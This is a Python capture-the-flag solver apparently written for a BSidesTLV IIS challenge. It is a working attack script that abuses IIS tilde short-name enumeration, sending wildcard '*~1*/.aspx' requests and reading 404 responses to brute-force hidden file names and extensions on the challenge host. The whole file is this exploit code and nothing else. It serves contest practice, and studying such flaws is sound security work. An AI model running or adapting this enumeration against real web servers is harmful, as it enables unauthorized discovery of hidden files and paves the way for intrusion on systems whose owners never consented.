iis_steroids.py

import requests
import string
import time
import mimetypes

def recursive_find_chars(filename, bad_char=None, tree_num=0):
    start_len = len(filename)
    filenames = []
    try_chars = [char for char in string.printable if char not in string.ascii_uppercase and char not in '#$%&()*+,-.\/:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'] 
    if bad_char:
        try_chars.remove(bad_char)
    for char in try_chars:
        print('\n-------------------')
        print('Tree num: ', tree_num)
        print('Current filename: ', filename)
        print('Trying char: ', char)
        r = requests.get('http://iis.challenges.bsidestlv.com/{0}{1}*~1*/.aspx'.format(filename, char))
        print(r.text)
        if r.status_code == 200 or 'BSidesTLV{' in r.text:
            raise Exception('\nRESULT\nRESULT\nRESULT\nRESULT\n')
        print('-------------------')
        if r.status_code == 404:
            recursive_search = recursive_find_chars(filename, bad_char=char, tree_num=tree_num + 1)
            if recursive_search:
                filenames.append(recursive_search)
            filename += char
    if start_len == len(filename):
        filenames.append(filename)
    return filenames

def find_chars():
    try_chars = [char for char in string.printable if char not in string.ascii_uppercase and char not in '#$%&()*+,-.\/:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'] 
    filename = ''
    while True:
        for char in try_chars:
            print('\n-------------------')
            print('Current filename: ', filename)
            print('Trying char: ', char)
            r = requests.get('http://iis.challenges.bsidestlv.com/{0}{1}*~1*/.aspx'.format(filename, char))
            print(r.text)
            print('-------------------')
            if r.status_code == 404:
                filename += char
                break
    print('\nFilename: ' + filename)

def try_extensions(exts, filename='', exit_on_find=False):
    while True:
        for ext in exts:
            print('\n-------------------')
            print('Trying ext: ', ext)
            r = requests.get('http://iis.challenges.bsidestlv.com/' + filename + ext)
            print('http://iis.challenges.bsidestlv.com/' + filename + ext)
            print(r.text)
            if r.status_code != 400:
                print('\nRESULT\nRESULT\nRESULT\nRESULT\n')
                if exit_on_find:
                    break
            print('-------------------')
        filename = filename[:-1]

def main():
    #find_chars()
    #try_extensions(mimetypes.types_map, filename='l3v3lupah1dd3n', exit_on_find=True)
    #try_extensions(['~1/.aspx', '~1.%3F/.aspx', '~1.%3F%3F/.aspx', '~1.%3F%3F%3F/.aspx'], filename='l3v3lupah1dd3n')
    filenames = recursive_find_chars('')
    print('END RESULT FILENAMES: {0}'.format(filenames))

if __name__ == '__main__':
    main()